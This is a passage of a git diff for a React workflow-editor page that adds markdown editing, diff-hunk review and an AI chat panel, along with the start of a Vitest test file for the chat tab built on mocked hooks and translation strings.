   const [loading, setLoading] = useState(true);
   const [error, setError] = useState<string | null>(null);
   const [panelOpen, setPanelOpen] = useState(true);
-  const [panelWidth, setPanelWidth] = useState(getInitialPanelWidth);
+  const [panelWidth, setPanelWidth] = useState(getInitialSidePanelWidth);
   const [runToast, setRunToast] = useState<{ type: 'success' | 'error'; text: string } | null>(null);
   const [drawerNode, setDrawerNode] = useState<WorkflowNode | null>(null);
   const [latestExecution, setLatestExecution] = useState<WorkflowExecution | null>(null);
-  const [layoutKey, setLayoutKey] = useState(0);
   const [canvasTab, setCanvasTab] = useState<CanvasTab>('flow');
+  const [rightPanelTab, setRightPanelTab] = useState<RightPanelTabId>('overview');
   const [showMdHint, setShowMdHint] = useState(false);
+  const [editDocDraft, setEditDocDraft] = useState('');
+  const [editDocBase, setEditDocBase] = useState('');
+  const [editDocMode, setEditDocMode] = useState<WorkflowDocumentMode>('preview');
+  const [editDocDiff, setEditDocDiff] = useState<EditDocDiff | null>(null);
+  const [editDocSaving, setEditDocSaving] = useState(false);
+  const [editDocReviewing, setEditDocReviewing] = useState<string | null>(null);
+  const [chatLaunchRequest, setChatLaunchRequest] = useState<WorkflowChatLaunchRequest | null>(null);
+  const [workflowChatSession, setWorkflowChatSession] = useState<WorkflowChatSessionRef | null>(null);
   const hasAutoSwitchedRef = useRef(false);
+  const chatLaunchSeqRef = useRef(0);
+  const editDocWorkflowIdRef = useRef<string | null>(null);
+  const missingMarkdownAutoLaunchRef = useRef<string | null>(null);
   const dragging = useRef(false);
   const dragStartX = useRef(0);
   const dragStartWidth = useRef(0);
@@ -54,9 +90,7 @@ export default function WorkflowDetail() {
   // 视口尺寸变化时，若面板比例超出合理范围则自动修正
   useEffect(() => {
     const onResize = () => {
-      const sidebarWidth = window.innerWidth >= 1024 ? 256 : 0;
-      const maxAllowed = Math.round((window.innerWidth - sidebarWidth) * 0.7);
-      setPanelWidth((w) => Math.min(w, Math.max(PANEL_MIN, maxAllowed)));
+      setPanelWidth((w) => Math.min(w, getMaxSidePanelWidth()));
     };
     window.addEventListener('resize', onResize);
     return () => window.removeEventListener('resize', onResize);
@@ -68,13 +102,12 @@ export default function WorkflowDetail() {
     dragStartX.current = e.clientX;
     dragStartWidth.current = panelWidth;
 
-    const sidebarWidth = window.innerWidth >= 1024 ? 256 : 0;
-    const panelMax = Math.round((window.innerWidth - sidebarWidth) * 0.7);
+    const panelMax = getMaxSidePanelWidth();
 
     const onMove = (ev: MouseEvent) => {
       if (!dragging.current) return;
       const delta = dragStartX.current - ev.clientX;
-      setPanelWidth(Math.min(panelMax, Math.max(PANEL_MIN, dragStartWidth.current + delta)));
+      setPanelWidth(Math.min(panelMax, Math.max(SIDE_PANEL_MIN_WIDTH, dragStartWidth.current + delta)));
     };
     const onUp = () => {
       dragging.current = false;
@@ -119,6 +152,17 @@ export default function WorkflowDetail() {
     void loadWorkflow();
   }, [id, loadWorkflow]);
 
+  useEffect(() => {
+    const next = workflow?.markdownContent ?? workflow?.editMarkdownContent ?? '';
+    const workflowIdChanged = (workflow?.id ?? null) !== editDocWorkflowIdRef.current;
+    editDocWorkflowIdRef.current = workflow?.id ?? null;
+    setEditDocDraft(next);
+    setEditDocBase(next);
+    if (workflowIdChanged) {
+      setEditDocMode(next ? 'preview' : 'edit');
+    }
+  }, [workflow?.id, workflow?.markdownContent, workflow?.editMarkdownContent]);
+
   const refreshWorkflowStats = useCallback(() => {
     void loadWorkflow({ preserveExecution: true, silent: true });
   }, [loadWorkflow]);
@@ -128,9 +172,25 @@ export default function WorkflowDetail() {
     setTimeout(() => setRunToast(null), 3000);
   }, []);
 
-  // 自动布局：递增 layoutKey 触发 FlowCanvas 重新 BFS 布局
-  const handleAutoLayout = useCallback(() => {
-    setLayoutKey((k) => k + 1);
+  const openAiEditPanel = useCallback(() => {
+    setPanelOpen(true);
+    setCanvasTab('md');
+    setEditDocMode('edit');
+    setShowMdHint(false);
+    setRightPanelTab('chat');
+  }, []);
+
+  const handleFlocksHelp = useCallback(() => {
+    openAiEditPanel();
+  }, [openAiEditPanel]);
+
+  const handleRightPanelTabChange = useCallback((tab: RightPanelTabId) => {
+    setRightPanelTab(tab);
+    if (tab === 'chat') {
+      setCanvasTab('md');
+      setEditDocMode('edit');
+      setShowMdHint(false);
+    }
   }, []);
 
   // 删除工作流
@@ -161,17 +221,336 @@ export default function WorkflowDetail() {
     }
   }, [workflow, showToast]);
 
-  // 导出 MD 文件
-  const handleExportMd = useCallback(() => {
-    if (!workflow?.markdownContent) return;
-    const blob = new Blob([workflow.markdownContent], { type: 'text/markdown' });
+  const editDocDirty = editDocDraft !== editDocBase;
+  const editDocDiffLines = useMemo(() => (
+    editDocDiff ? buildLineDiff(editDocDiff.before, editDocDiff.after) : []
+  ), [editDocDiff]);
+  const editDocDiffStats = useMemo(() => ({
+    added: editDocDiffLines.filter((line) => line.type === 'add').length,
+    removed: editDocDiffLines.filter((line) => line.type === 'remove').length,
+  }), [editDocDiffLines]);
+  const editDocDiffHunks = useMemo(() => (
+    editDocDiff ? buildTextDiffHunks(editDocDiff.before, editDocDiff.after) : []
+  ), [editDocDiff]);
+
+  const handleWorkflowChatSessionChange = useCallback((sessionId: string | null) => {
+    const workflowId = workflow?.id;
+    setWorkflowChatSession(sessionId && workflowId ? { workflowId, sessionId } : null);
+  }, [workflow?.id]);
+
+  const recordEditDocReviewResult = useCallback(async ({
+    decision,
+    scope,
+    hunk,
+    remainingHunks,
+  }: {
+    decision: 'accepted' | 'rejected';
+    scope: 'full_diff' | 'hunk';
+    hunk?: TextDiffHunk;
+    remainingHunks?: number;
+  }) => {
+    const workflowId = workflow?.id;
+    const chatSession = workflowChatSession;
+    const sessionId = chatSession && chatSession.workflowId === workflowId
+      ? chatSession.sessionId
+      : null;
+    if (!workflowId || !sessionId) return;
+
+    const proposedChangeApplied = decision === 'accepted'
+      ? (scope === 'full_diff' ? 'true' : 'true_for_this_hunk')
+      : (scope === 'full_diff' ? 'false' : 'false_for_this_hunk');
+    const reviewState = remainingHunks && remainingHunks > 0 ? 'pending_remaining_hunks' : 'completed';
+    const summary = decision === 'accepted'
+      ? (scope === 'full_diff'
+        ? 'The user accepted the AI-proposed workflow.md diff. Treat the current workflow.md content as successfully applied.'
+        : 'The user accepted this workflow.md diff hunk. Treat this hunk as successfully applied while the remaining hunks may still need review.')
+      : (scope === 'full_diff'
+        ? 'The user rejected the AI-proposed workflow.md diff. Treat the proposed change as not applied; workflow.md was restored to the previous content.'
+        : 'The user rejected this workflow.md diff hunk. Treat this hunk as not applied; workflow.md was saved with this hunk reverted.');
+
+    const text = [
+      '[Workflow markdown diff review result]',
+      'Use this hidden context in future assistant turns. Do not claim a proposed workflow.md change succeeded unless proposed_change_applied is true or true_for_this_hunk.',
+      `workflow_id: ${workflowId}`,
+      'file: workflow.md',
+      `decision: ${decision}`,
+      `scope: ${scope}`,
+      `proposed_change_applied: ${proposedChangeApplied}`,
+      `review_state: ${reviewState}`,
+      ...(hunk ? [
+        `hunk_id: ${hunk.id}`,
+        `hunk_added_lines: ${hunk.added}`,
+        `hunk_removed_lines: ${hunk.removed}`,
+      ] : []),
+      remainingHunks !== undefined ? `remaining_diff_hunks: ${remainingHunks}` : null,
+      `summary: ${summary}`,
+    ].filter(Boolean).join('\n');
+
+    try {
+      await sessionApi.sendMessage(sessionId, {
+        parts: [{ type: 'text', text }],
+        noReply: true,
+      });
+    } catch (err) {
+      console.warn('[WorkflowDetail] failed to record workflow markdown review result', err);
+    }
+  }, [workflow?.id, workflowChatSession]);
+
+  // Export workflow.md
+  const handleExportEditDoc = useCallback(() => {
+    if (!workflow || !editDocDraft.trim()) return;
+    const blob = new Blob([editDocDraft], { type: 'text/markdown' });
     const url = URL.createObjectURL(blob);
     const a = document.createElement('a');
     a.href = url;
-    a.download = `workflow-${workflow.name || workflow.id}.md`;
+    a.download = `${workflow.id || workflow.name}.md`;
     a.click();
     URL.revokeObjectURL(url);
-  }, [workflow]);
+  }, [editDocDraft, workflow]);
+
+  const buildEditDocGenerationPrompt = useCallback(() => {
+    if (!workflow) return '';
+    const workflowDir = workflow.source === 'global'
+      ? `~/.flocks/plugins/workflows/${workflow.id}/`
+      : `.flocks/plugins/workflows/${workflow.id}/`;
+
+    return t('detail.generateEditDocPrompt', {
+      name: workflow.name,
+      dir: workflowDir,
+      mdPath: `${workflowDir}workflow.md`,
+      jsonPath: `${workflowDir}workflow.json`,
+      workflowJson: JSON.stringify(workflow.workflowJson, null, 2),
+    });
+  }, [t, workflow]);
+
+  const launchEditDocGeneration = useCallback(() => {
+    if (!workflow) return;
+
+    openAiEditPanel();
+    setChatLaunchRequest({
+      id: chatLaunchSeqRef.current + 1,
+      prompt: buildEditDocGenerationPrompt(),
+      displayLabel: t('detail.generateEditDoc'),
+    });
+    chatLaunchSeqRef.current += 1;
+  }, [buildEditDocGenerationPrompt, openAiEditPanel, t, workflow]);
+
+  const handleGenerateEditDoc = useCallback(() => {
+    if (!workflow) return;
+    if (!editDocDraft.trim()) {
+      launchEditDocGeneration();
+      return;
+    }
+
+    setEditDocDraft(buildWorkflowMarkdown(workflow));
+    setEditDocDiff(null);
+    setEditDocMode('edit');
+    setShowMdHint(false);
+  }, [editDocDraft, launchEditDocGeneration, workflow]);
+
+  const buildWorkflowGenerationPrompt = useCallback((editDocContent: string) => {
+    if (!workflow) return '';
+    const workflowDir = workflow.source === 'global'
+      ? `~/.flocks/plugins/workflows/${workflow.id}/`
+      : `.flocks/plugins/workflows/${workflow.id}/`;
+
+    return t('detail.generateWorkflowPrompt', {
+      name: workflow.name,
+      dir: workflowDir,
+      mdPath: `${workflowDir}workflow.md`,
+      jsonPath: `${workflowDir}workflow.json`,
+      editDocContent,
+    });
+  }, [t, workflow]);
+
+  const launchWorkflowGeneration = useCallback((content: string) => {
+    if (!workflow) return;
+
+    openAiEditPanel();
+    setChatLaunchRequest({
+      id: chatLaunchSeqRef.current + 1,
+      prompt: buildWorkflowGenerationPrompt(content),
+      displayLabel: t('detail.generateWorkflow'),
+    });
+    chatLaunchSeqRef.current += 1;
+  }, [buildWorkflowGenerationPrompt, openAiEditPanel, t, workflow]);
+
+  const launchWorkflowGuidePrompt = useCallback((prompt: string, displayLabel: string) => {
+    openAiEditPanel();
+    setChatLaunchRequest({
+      id: chatLaunchSeqRef.current + 1,
+      prompt,
+      displayLabel,
+    });
+    chatLaunchSeqRef.current += 1;
+  }, [openAiEditPanel]);
+
+  const handleGenerateWorkflow = useCallback(() => {
+    if (!workflow) return;
+    const content = editDocDraft.trim();
+    if (!content) {
+      launchEditDocGeneration();
+      return;
+    }
+
+    launchWorkflowGeneration(editDocDraft);
+  }, [editDocDraft, launchEditDocGeneration, launchWorkflowGeneration, workflow]);
+
+  useEffect(() => {
+    if (rightPanelTab !== 'chat') return;
+    if (!workflow || editDocDraft.trim() || !hasWorkflowJsonDefinition(workflow)) return;
+    if (chatLaunchRequest) return;
+    if (missingMarkdownAutoLaunchRef.current === workflow.id) return;
+    missingMarkdownAutoLaunchRef.current = workflow.id;
+    launchEditDocGeneration();
+  }, [chatLaunchRequest, editDocDraft, launchEditDocGeneration, rightPanelTab, workflow]);
+
+  const handleChatLaunchRequestHandled = useCallback((requestId: number) => {
+    setChatLaunchRequest((current) => (
+      current?.id === requestId ? null : current
+    ));
+  }, []);
+
+  const handleSaveEditDoc = useCallback(async () => {
+    if (!workflow || editDocSaving) return;
+    const regenerateAfterSave = await confirm({
+      title: t('detail.regenerateWorkflowConfirmTitle'),
+      description: t('detail.regenerateWorkflowConfirmDesc'),
+      confirmText: t('detail.regenerateWorkflowConfirmYes'),
+      cancelText: t('detail.regenerateWorkflowConfirmNo'),
+      variant: 'default',
+    });
+    const content = editDocDraft.endsWith('\n') ? editDocDraft : `${editDocDraft}\n`;
+    setEditDocSaving(true);
+    try {
+      const response = await workflowAPI.update(workflow.id, {
+        markdownContent: content,
+      });
+      const updated = {
+        ...response.data,
+        markdownContent: response.data.markdownContent ?? content,
+        editMarkdownContent: response.data.editMarkdownContent ?? response.data.markdownContent ?? content,
+      };
+      setWorkflow(updated);
+      setEditDocDraft(updated.markdownContent ?? content);
+      setEditDocBase(updated.markdownContent ?? content);
+      setEditDocDiff(null);
+      setEditDocMode('preview');
+      showToast('success', t('detail.editDocSaveSuccess'));
+      if (regenerateAfterSave) {
+        launchWorkflowGeneration(updated.markdownContent ?? content);
+      }
+    } catch (err: unknown) {
+      showToast('error', `${t('detail.editDocSaveFailed')}: ${extractErrorMessage(err)}`);
+    } finally {
+      setEditDocSaving(false);
+    }
+  }, [confirm, editDocDraft, editDocSaving, launchWorkflowGeneration, showToast, t, workflow]);
+
+  const handleAcceptEditDocDiff = useCallback(() => {
+    setEditDocDiff(null);
+    setShowMdHint(false);
+    showToast('success', t('detail.editDocDiffAcceptSuccess'));
+    void recordEditDocReviewResult({
+      decision: 'accepted',
+      scope: 'full_diff',
+      remainingHunks: 0,
+    });
+  }, [recordEditDocReviewResult, showToast, t]);
+
+  const handleAcceptEditDocDiffHunk = useCallback((hunk: TextDiffHunk) => {
+    if (!editDocDiff) return;
+    const nextBefore = acceptTextDiffHunk(editDocDiff.before, hunk);
+    if (nextBefore === editDocDiff.after) {
+      setEditDocDiff(null);
+      setShowMdHint(false);
+    } else {
+      setEditDocDiff({
+        before: nextBefore,
+        after: editDocDiff.after,
+      });
+    }
+    showToast('success', t('detail.editDocDiffAcceptHunkSuccess'));
+    void recordEditDocReviewResult({
+      decision: 'accepted',
+      scope: 'hunk',
+      hunk,
+      remainingHunks: nextBefore === editDocDiff.after ? 0 : Math.max(0, editDocDiffHunks.length - 1),
+    });
+  }, [editDocDiff, editDocDiffHunks.length, recordEditDocReviewResult, showToast, t]);
+
+  const handleRejectEditDocDiff = useCallback(async () => {
+    if (!workflow || !editDocDiff || editDocReviewing) return;
+    const content = editDocDiff.before;
+    setEditDocReviewing('reject');
+    try {
+      const response = await workflowAPI.update(workflow.id, {
+        markdownContent: content,
+      });
+      const updated = {
+        ...response.data,
+        markdownContent: response.data.markdownContent ?? content,
+        editMarkdownContent: response.data.editMarkdownContent ?? response.data.markdownContent ?? content,
+      };
+      setWorkflow(updated);
+      setEditDocDraft(updated.markdownContent ?? content);
+      setEditDocBase(updated.markdownContent ?? content);
+      setEditDocDiff(null);
+      setEditDocMode('edit');
+      setShowMdHint(false);
+      showToast('success', t('detail.editDocDiffRejectSuccess'));
+      void recordEditDocReviewResult({
+        decision: 'rejected',
+        scope: 'full_diff',
+        remainingHunks: 0,
+      });
+    } catch (err: unknown) {
+      showToast('error', `${t('detail.editDocDiffRejectFailed')}: ${extractErrorMessage(err)}`);
+    } finally {
+      setEditDocReviewing(null);
+    }
+  }, [editDocDiff, editDocReviewing, recordEditDocReviewResult, showToast, t, workflow]);
+
+  const handleRejectEditDocDiffHunk = useCallback(async (hunk: TextDiffHunk) => {
+    if (!workflow || !editDocDiff || editDocReviewing) return;
+    const content = rejectTextDiffHunk(editDocDiff.after, hunk);
+    setEditDocReviewing(`reject:${hunk.id}`);
+    try {
+      const response = await workflowAPI.update(workflow.id, {
+        markdownContent: content,
+      });
+      const updated = {
+        ...response.data,
+        markdownContent: response.data.markdownContent ?? content,
+        editMarkdownContent: response.data.editMarkdownContent ?? response.data.markdownContent ?? content,
+      };
+      const nextAfter = updated.markdownContent ?? content;
+      setWorkflow(updated);
+      setEditDocDraft(nextAfter);
+      setEditDocBase(nextAfter);
+      if (nextAfter === editDocDiff.before) {
+        setEditDocDiff(null);
+        setShowMdHint(false);
+      } else {
+        setEditDocDiff({
+          before: editDocDiff.before,
+          after: nextAfter,
+        });
+      }
+      setEditDocMode('edit');
+      showToast('success', t('detail.editDocDiffRejectHunkSuccess'));
+      void recordEditDocReviewResult({
+        decision: 'rejected',
+        scope: 'hunk',
+        hunk,
+        remainingHunks: nextAfter === editDocDiff.before ? 0 : Math.max(0, editDocDiffHunks.length - 1),
+      });
+    } catch (err: unknown) {
+      showToast('error', `${t('detail.editDocDiffRejectHunkFailed')}: ${extractErrorMessage(err)}`);
+    } finally {
+      setEditDocReviewing(null);
+    }
+  }, [editDocDiff, editDocDiffHunks.length, editDocReviewing, recordEditDocReviewResult, showToast, t, workflow]);
 
   // 用户手动切换 canvas tab 时，阻止后续自动跳转
   const handleCanvasTabChange = useCallback((tab: CanvasTab) => {
@@ -191,14 +570,28 @@ export default function WorkflowDetail() {
 
   // 对话编辑模式：Rex 修改工作流后，ChatTab 即时通知刷新画布和节点抽屉
   const handleWorkflowUpdated = useCallback((updated: Workflow) => {
+    const previousMarkdown = workflow?.markdownContent ?? workflow?.editMarkdownContent ?? '';
+    const nextMarkdown = updated.markdownContent ?? updated.editMarkdownContent ?? '';
+    const markdownChanged = (
+      nextMarkdown !== previousMarkdown
+    );
     setWorkflow(updated);
+    if (markdownChanged) {
+      setEditDocDiff({
+        before: previousMarkdown,
+        after: nextMarkdown,
+      });
+      setCanvasTab('md');
+      setEditDocMode('edit');
+      setShowMdHint(true);
+    }
     // 同步更新节点抽屉：若当前打开的节点在新版本中存在则用最新数据，否则关闭抽屉
     setDrawerNode((prev) => {
       if (!prev) return null;
       const fresh = updated.workflowJson.nodes.find((n) => n.id === prev.id);
       return fresh ?? null;
     });
-  }, []);
+  }, [workflow?.editMarkdownContent, workflow?.markdownContent]);
 
   if (loading) {
     return (
@@ -254,9 +647,9 @@ export default function WorkflowDetail() {
       )}
 
       {/* 主体区域：画布 + 拖动分隔条 + 右侧面板 */}
-      <div className="flex flex-1 min-h-0 overflow-hidden">
+      <div className="relative isolate flex flex-1 min-h-0 overflow-hidden">
         {/* 左侧画布区域（含三 Tab） */}
-        <div className="flex flex-col flex-1 min-w-0">
+        <div className="relative z-0 flex flex-col flex-1 min-w-0 overflow-hidden">
           {/* Canvas Tab 栏 */}
           <div className="flex items-center border-b border-gray-200 bg-white flex-shrink-0 px-2">
             {CANVAS_TABS.map((tab) => (
@@ -299,52 +692,58 @@ export default function WorkflowDetail() {
                 workflowJson={workflow.workflowJson}
                 editable={false}
                 onNodeClick={(node) => setDrawerNode(node)}
-                layoutKey={layoutKey}
               />
-              {/* 重置布局按钮 - 右上角浮动 */}
+              {/* Flow chart quick actions */}
               <button
-                onClick={handleAutoLayout}
-                className="absolute top-3 right-3 z-10 flex items-center gap-1.5 px-3 py-1.5 bg-white border border-gray-200 text-gray-600 text-xs rounded-lg hover:bg-gray-50 shadow-sm transition-colors"
-                title={t('detail.resetLayout')}
+                onClick={handleFlocksHelp}
+                className="absolute left-3 top-2 z-20 inline-flex max-w-[calc(100%-7rem)] items-center gap-2 truncate whitespace-nowrap rounded-lg border border-emerald-100 bg-white/90 px-3 py-1.5 text-xs font-medium text-slate-700 backdrop-blur transition-colors hover:border-emerald-200 hover:bg-emerald-50/80 hover:text-emerald-700 focus:outline-none focus:ring-2 focus:ring-emerald-100"
+                title={t('detail.flocksHelpTitle')}
               >
-                <Layout className="w-3.5 h-3.5" />
-                {t('detail.resetLayout')}
+                <Bot className="h-4 w-4 flex-shrink-0 text-emerald-500" />
+                <span className="truncate">{t('detail.flocksHelp')}</span>
               </button>
             </div>
 
             {/* MD 描述 */}
             {canvasTab === 'md' && (
-              <div className="absolute inset-0 overflow-y-auto bg-white p-6">
-                {/* 下载 MD 按钮 - 右上角浮动 */}
-                <button
-                  onClick={handleExportMd}
-                  disabled={!workflow.markdownContent}
-                  className="absolute top-3 right-3 z-10 flex items-center gap-1.5 px-3 py-1.5 bg-white border border-gray-200 text-gray-600 text-xs rounded-lg hover:bg-gray-50 shadow-sm disabled:opacity-40 disabled:cursor-not-allowed transition-colors"
-                  title={t('detail.downloadMdTitle')}
-                >
-                  <Download className="w-3.5 h-3.5" />
-                  {t('detail.downloadMd')}
-                </button>
-                {workflow.markdownContent ? (
-                  <div className="max-w-3xl mx-auto prose prose-sm prose-gray leading-relaxed">
-                    <ReactMarkdown remarkPlugins={[remarkGfm]}>
-                      {workflow.markdownContent}
-                    </ReactMarkdown>
-                  </div>
-                ) : (
-                  <div className="flex flex-col items-center justify-center h-full gap-2 text-gray-400">
-                    <FileText className="w-10 h-10 opacity-40" />
-                    <p className="text-sm">{t('detail.noMdDesc')}</p>
-                    <p className="text-xs">{t('detail.noMdDescHint')}</p>
-                  </div>
-                )}
-              </div>
+              <WorkflowDocumentPanel
+                mode={editDocMode}
+                value={editDocDraft}
+                dirty={editDocDirty}
+                saving={editDocSaving}
+                saveDisabled={!editDocDirty || editDocSaving}
+                onModeChange={setEditDocMode}
+                onChange={(value) => {
+                  setEditDocDraft(value);
+                  setEditDocDiff(null);
+                }}
+                onResetDocument={handleGenerateEditDoc}
+                onSave={() => void handleSaveEditDoc()}
+                onGenerateWorkflow={handleGenerateWorkflow}
+                onDownload={handleExportEditDoc}
+                diffReview={
+                  editDocDiff ? (
+                    <WorkflowMarkdownDiffReview
+                      lines={editDocDiffLines}
+                      hunks={editDocDiffHunks}
+                      added={editDocDiffStats.added}
+                      removed={editDocDiffStats.removed}
+                      reviewingId={editDocReviewing}
+                      disabled={editDocSaving || editDocReviewing !== null}
+                      onAccept={handleAcceptEditDocDiff}
+                      onReject={() => void handleRejectEditDocDiff()}
+                      onAcceptHunk={handleAcceptEditDocDiffHunk}
+                      onRejectHunk={(hunk) => void handleRejectEditDocDiffHunk(hunk)}
+                    />
+                  ) : undefined
+                }
+              />
             )}
 
             {/* JSON */}
             {canvasTab === 'json' && (
               <div className="absolute inset-0 overflow-y-auto bg-gray-900 p-4">
-                {/* 下载 JSON 按钮 - 右上角浮动 */}
+                {/* Download workflow file button - floating at the top right */}
                 <button
                   onClick={handleExport}
                   className="absolute top-3 right-3 z-10 flex items-center gap-1.5 px-3 py-1.5 bg-gray-700 border border-gray-600 text-gray-200 text-xs rounded-lg hover:bg-gray-600 shadow-sm transition-colors"
@@ -380,7 +779,7 @@ export default function WorkflowDetail() {
         {panelOpen && (
           <div
             onMouseDown={onDragStart}
-            className="w-1 flex-shrink-0 bg-gray-200 hover:bg-red-400 active:bg-red-500 cursor-col-resize transition-colors duration-150 relative group"
+            className="relative z-20 w-1 flex-shrink-0 bg-gray-200 hover:bg-red-400 active:bg-red-500 cursor-col-resize transition-colors duration-150 group"
             title={t('detail.dragAdjust')}
           >
             <div className="absolute inset-y-0 -left-1.5 -right-1.5" />
@@ -393,10 +792,16 @@ export default function WorkflowDetail() {
           latestExecution={latestExecution}
           open={panelOpen}
           width={panelWidth}
+          activeTab={rightPanelTab}
+          onActiveTabChange={handleRightPanelTabChange}
+          chatLaunchRequest={chatLaunchRequest}
+          onChatLaunchRequestHandled={handleChatLaunchRequestHandled}
           onLatestExecutionChange={setLatestExecution}
           onExecutionSettled={refreshWorkflowStats}
           onWorkflowUpdated={handleWorkflowUpdated}
           onFirstMessageSent={handleFirstMessageSent}
+          onSessionChange={handleWorkflowChatSessionChange}
+          onGuidePrompt={launchWorkflowGuidePrompt}
           selectedNode={drawerNode}
           onDeselectNode={() => setDrawerNode(null)}
           onDelete={handleDelete}
diff --git a/webui/src/pages/WorkflowDetail/tabs/ChatTab.test.tsx b/webui/src/pages/WorkflowDetail/tabs/ChatTab.test.tsx
new file mode 100644
index 000000000..894f218e8
--- /dev/null
+++ b/webui/src/pages/WorkflowDetail/tabs/ChatTab.test.tsx
@@ -0,0 +1,623 @@
+import { render, screen, waitFor } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+import { MemoryRouter } from 'react-router-dom';
+import type { ComponentProps } from 'react';
+
+import ChatTab from './ChatTab';
+import { workflowAPI } from '@/api/workflow';
+import { setStoredSessions } from '../sessionStorage';
+
+const { // Spies and capture buffers shared by the vi.mock factories below; created via vi.hoisted so they exist when those hoisted factories run.
+  capturedSessionChatProps,
+  capturedSessionOptions,
+  mockClientGet,
+  mockCreate,
+  mockCreateAndSend,
+  mockReset,
+  mockSendPrompt,
+  mockUseAgents,
+  mockUseProviders,
+  mockDefaultModelGetResolved,
+  mockModelListDefinitions,
+} = vi.hoisted(() => ({
+  capturedSessionChatProps: [] as any[], // props from each render of the mocked SessionChat
+  capturedSessionOptions: [] as any[], // options from each call of the mocked useSessionChat
+  mockClientGet: vi.fn(),
+  mockCreate: vi.fn(),
+  mockCreateAndSend: vi.fn(),
+  mockReset: vi.fn(),
+  mockSendPrompt: vi.fn(),
+  mockUseAgents: vi.fn(),
+  mockUseProviders: vi.fn(),
+  mockDefaultModelGetResolved: vi.fn(),
+  mockModelListDefinitions: vi.fn(),
+}));
+
+vi.mock('@/hooks/useDefaultModelVision', () => ({
+  useDefaultModelVision: () => false,
+}));
+
+vi.mock('@/hooks/useSessionChat', () => {
+  // Stub hook: logs each options object and reports an idle, session-less state.
+  const useSessionChat = (options: any) => {
+    capturedSessionOptions.push(options);
+    return {
+      sessionId: null, loading: false, error: null,
+      create: mockCreate,
+      createAndSend: mockCreateAndSend,
+      reset: mockReset,
+    };
+  };
+  return { useSessionChat };
+});
+
+vi.mock('@/api/client', () => ({
+  default: { get: mockClientGet },
+}));
+
+vi.mock('@/api/workflow', () => ({
+  workflowAPI: { get: vi.fn() },
+  workflowAPIEndpoints: (id: string, triggerId = '{triggerId}') => {
+    const workflowBase = `/api/workflow/${id}`;
+    const triggerBase = `${workflowBase}/triggers`;
+    const triggerRecord = `${triggerBase}/${triggerId}`;
+    return {
+      config: {
+        read: `GET ${workflowBase}/config`,
+        write: `PUT ${workflowBase}/config`,
+        syncFallback: `POST ${workflowBase}/config/sync`,
+      },
+      apiService: {
+        read: `GET ${workflowBase}/service`,
+        publish: `POST ${workflowBase}/publish`,
+        unpublish: `POST ${workflowBase}/unpublish`,
+        delete: `DELETE ${workflowBase}/service`,
+      },
+      triggers: {
+        list: `GET ${triggerBase}`,
+        create: `POST ${triggerBase}`,
+        update: `PUT ${triggerRecord}`,
+        delete: `DELETE ${triggerRecord}`,
+        status: `GET ${triggerRecord}/status`,
+        previewMapping: `POST ${triggerRecord}/preview-mapping`,
+        test: `POST ${triggerRecord}/test`,
+        invokeWebhook: `/webhook/workflows/${id}/${triggerId}`,
+        plugins: 'GET /api/workflow-trigger-plugins',
+      },
+      legacyAdapters: {
+        kafkaConfig: `GET/POST ${workflowBase}/kafka-config`,
+        kafkaStatus: `GET ${workflowBase}/kafka-status`,
+        pollerConfig: `GET/POST ${workflowBase}/poller-config`,
+        pollerStatus: `GET ${workflowBase}/poller-status`,
+        pollerRunOnce: `POST ${workflowBase}/poller-run-once`,
+        syslogConfig: `GET/POST ${workflowBase}/syslog-config`,
+        syslogStatus: `GET ${workflowBase}/syslog-status`,
+      },
+    };
+  },
+}));
+
+vi.mock('@/hooks/useAgents', () => ({
+  useAgents: mockUseAgents,
+}));
+
+vi.mock('@/hooks/useProviders', () => ({
+  useProviders: mockUseProviders,
+}));
+
+vi.mock('@/api/provider', () => ({
+  defaultModelAPI: { getResolved: mockDefaultModelGetResolved },
+  modelV2API: { listDefinitions: mockModelListDefinitions },
+}));
+
+vi.mock('@/components/common/SessionChat', () => ({ // Stand-in for SessionChat: records props and renders only the slots the tests query.
+  buildInstructionDisplayText: (label: string) => `@@flocks-instruction:${label}`,
+  default: (props: any) => {
+    capturedSessionChatProps.push(props); // keep every render's props so tests can inspect them
+    return (
+      <div data-testid="session-chat">
+        {props.toolbarSlot}
+        {props.centerToolbarSlot}
+        {props.welcomeContent}
+        {props.conversationBottomSlot?.({ sendPrompt: mockSendPrompt, sending: false })}
+      </div>
+    );
+  },
+}));
+
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    t: (key: string, params?: Record<string, unknown>) => {
+      const translations: Record<string, string> = {
+        'detail.chat.sessionTitle': '修改工作流「{{name}}」',
+        'detail.chat.backendConfigAccessGuide': '后端配置库认证方式：使用 server_api_token，并通过 Authorization: Bearer 访问 {{configEndpoint}}；兜底迁移接口是 {{configSyncEndpoint}}。',
+        'detail.chat.contextMessage': [
+          '工作流 ID： {{id}}',
+          '工作流名称： {{name}}',
+          '工作流目录： {{dir}}',
+          'MD 文件： {{mdPath}}',
+          '工作流配置引导文件： {{guidePath}}',
+          '前端当前 API 清单：',
+          '{{apiEndpoints}}',
+          '配置工作流时必须先读取 guide.md；{{configSkillName}} 只提供交互协议。',
+        ].join('\n'),
+        'detail.chat.inputPlaceholder': '描述你想对工作流做的修改...',
+        'detail.chat.newSession': '新建会话',
+        'detail.chat.historyLabel': '历史会话',
+        'detail.chat.currentLabel': '当前',
+        'detail.chat.welcome.title': '{{name}} 当前状态',
+        'detail.chat.welcome.descPart1': '你可以直接描述需求。',
+        'detail.chat.welcome.descPart2': '。',
+        'detail.chat.welcome.mdTabLabel': '流程说明',
+        'detail.chat.welcome.editPanelTitle': 'Rex 辅助修改',
+        'detail.chat.welcome.editPanelDesc': '选择一个修改入口，Rex 会先读取 {{name}}。',
+        'detail.chat.welcome.editSectionTitle': '辅助修改',
+        'detail.chat.welcome.configSectionTitle': '辅助配置',
+        'detail.chat.welcome.publishSectionTitle': '辅助发布',
+        'detail.chat.welcome.editRequirementShort': '修改功能需求',
+        'detail.chat.welcome.editRequirementDesc': '整理功能修改需求',
+        'detail.chat.welcome.editRequirementPrompt': '用户点击了「修改功能需求」按钮。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}。',
+        'detail.chat.welcome.editNodeFunctionShort': '修改节点功能',
+        'detail.chat.welcome.editNodeFunctionDesc': '调整节点做什么',
+        'detail.chat.welcome.editNodeFunctionPrompt': '用户点击了「修改节点功能」按钮。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}。',
+        'detail.chat.welcome.editNodeShort': '编辑节点实现',
